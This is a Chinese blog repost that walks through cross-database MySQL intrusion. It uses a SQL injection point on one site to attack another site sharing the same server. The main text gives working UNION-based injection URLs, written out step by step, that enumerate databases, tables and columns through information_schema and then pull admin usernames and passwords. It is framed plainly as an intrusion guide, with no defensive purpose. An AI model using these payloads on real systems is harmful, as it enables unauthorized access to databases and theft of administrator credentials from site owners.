当前位置: 首页 > news >正文

Mysql跨库入侵介绍

入侵假想:
目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。

那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之…..
(当然你也可以把B站点入侵了,再入侵A。但不是有注入点就可以入侵的,偶?跑题了。)

大家知道在mysql5.0以后加入了 information_schemata 这个虚拟库,基本结构如下:
Information_schema-------| Schemata 存放数据库信息的表
| Tables 存放数据库中表信息的表
| Columns 存放数据库中列信息的表
…………………………………..
对我们入侵十分有帮助。
既然我们要跨库,就需要查询库信息。怎么查?上图,来得直接

还有一个要介绍的,假如我们要查询mysql库中的user表中的相关信息,我们可以这样查:

好了,XX们已经等不急了。

B站注入点:
http://www.b.com/b.php?ID=99

看看数据库基本情况
http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,concat(user(),0x2c,version())
5.x的mysql,挺好的。继续

查库:
http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,schema_name/**/from/**/information_schema.schemata/**/limit/**/0,1

这样查出来的就是mysql中的第一个数据库,想要查第二个数据库就将limit 0,1改为limit 1,1 
以此类推。


有人就要问了,你怎么知道A站点的数据库是哪个呀?
这个嘛,1.Load_file,要看运气
2.猜猜,还可以看A站是不是整站程序,凭经验猜猜,像helen这样的牛B社工猜出来没问题。
通过上面的操作,我们已经获取了A站点的数据库名 adb(假设)

查管理员表:
http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,table_name/**/from/**/information_schema.tables/**/where/**/table_schema=0x616462/**/limit/**/0,1、
………
得到管理员表为 adb_admin

查管理员中表的字段:
http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,column_name/**/from/**/information_schema.columns/**/where/**/table_name=0x6164625F61646D696E/**/limit/**/0,1
…………….
得到管理员表字段为 admin_name admin_pass

查管理员帐号信息:
http://www.b.com/b.php?ID=-99/**/union/**/select/**/1,concat(admin_name,0x2c,admin_pass)/**/from/**/adb.adb_admin/**/limit/**/0,1
…………………
OK到这里A站点的管理员信息也就查询出来了,XX们,继续入侵工作

注:
adb的Hex为0x616462
adb_admin的Hex为0x6164625F61646D696E

, 的Hex为0x2c


转自:老邪博客

相关文章:

  • web安全设置和目录权限设置介绍
  • oracle加固经验(个人补充及完善)
  • 域内计算机和用户获取
  • Access数据库注入高级玩法
  • 两个SQL语句判断数据库web是否分离
  • MYSQL注入中load_file()函数的进一步应用
  • load_file() MYSQL入侵时查看常用敏感信息文件
  • 渗透实战之安全设备踩点
  • MS SQL注入碰到关键词被过滤后的解决思路
  • MSSQL注入利用Group byhaving猜表名和字段名
  • 一份比较详细的DOS命令说明!
  • 一次利用imap漏洞的入侵
  • 学习SQL注入
  • Ubuntu配置apache
  • linux敏感文件
  • 《Java编程思想》读书笔记-对象导论
  • 【挥舞JS】JS实现继承,封装一个extends方法
  • CSS魔法堂:Absolute Positioning就这个样
  • iOS 颜色设置看我就够了
  • Js基础——数据类型之Null和Undefined
  • Sublime text 3 3103 注册码
  • TCP拥塞控制
  • win10下安装mysql5.7
  • 工程优化暨babel升级小记
  • 来,膜拜下android roadmap,强大的执行力
  • 算法---两个栈实现一个队列
  • 提醒我喝水chrome插件开发指南
  • 物联网链路协议
  • 用Visual Studio开发以太坊智能合约
  • AI算硅基生命吗,为什么?
  • python最赚钱的4个方向,你最心动的是哪个?
  • 没有任何编程基础可以直接学习python语言吗?学会后能够做什么? ...
  • ​【已解决】npm install​卡主不动的情况
  • ​LeetCode解法汇总2182. 构造限制重复的字符串
  • ​用户画像从0到100的构建思路
  • ###C语言程序设计-----C语言学习(3)#
  • #快捷键# 大学四年我常用的软件快捷键大全,教你成为电脑高手!!
  • #每日一题合集#牛客JZ23-JZ33
  • #图像处理
  • #我与Java虚拟机的故事#连载19:等我技术变强了,我会去看你的 ​
  • (10)STL算法之搜索(二) 二分查找
  • (2.2w字)前端单元测试之Jest详解篇
  • (Arcgis)Python编程批量将HDF5文件转换为TIFF格式并应用地理转换和投影信息
  • (react踩过的坑)Antd Select(设置了labelInValue)在FormItem中initialValue的问题
  • (Redis使用系列) Springboot 实现Redis 同数据源动态切换db 八
  • (第27天)Oracle 数据泵转换分区表
  • (附源码)spring boot北京冬奥会志愿者报名系统 毕业设计 150947
  • (附源码)springboot炼糖厂地磅全自动控制系统 毕业设计 341357
  • (附源码)ssm本科教学合格评估管理系统 毕业设计 180916
  • (强烈推荐)移动端音视频从零到上手(下)
  • (收藏)Git和Repo扫盲——如何取得Android源代码
  • (正则)提取页面里的img标签
  • .[backups@airmail.cc].faust勒索病毒的最新威胁:如何恢复您的数据?
  • .net CHARTING图表控件下载地址
  • .Net Core webapi RestFul 统一接口数据返回格式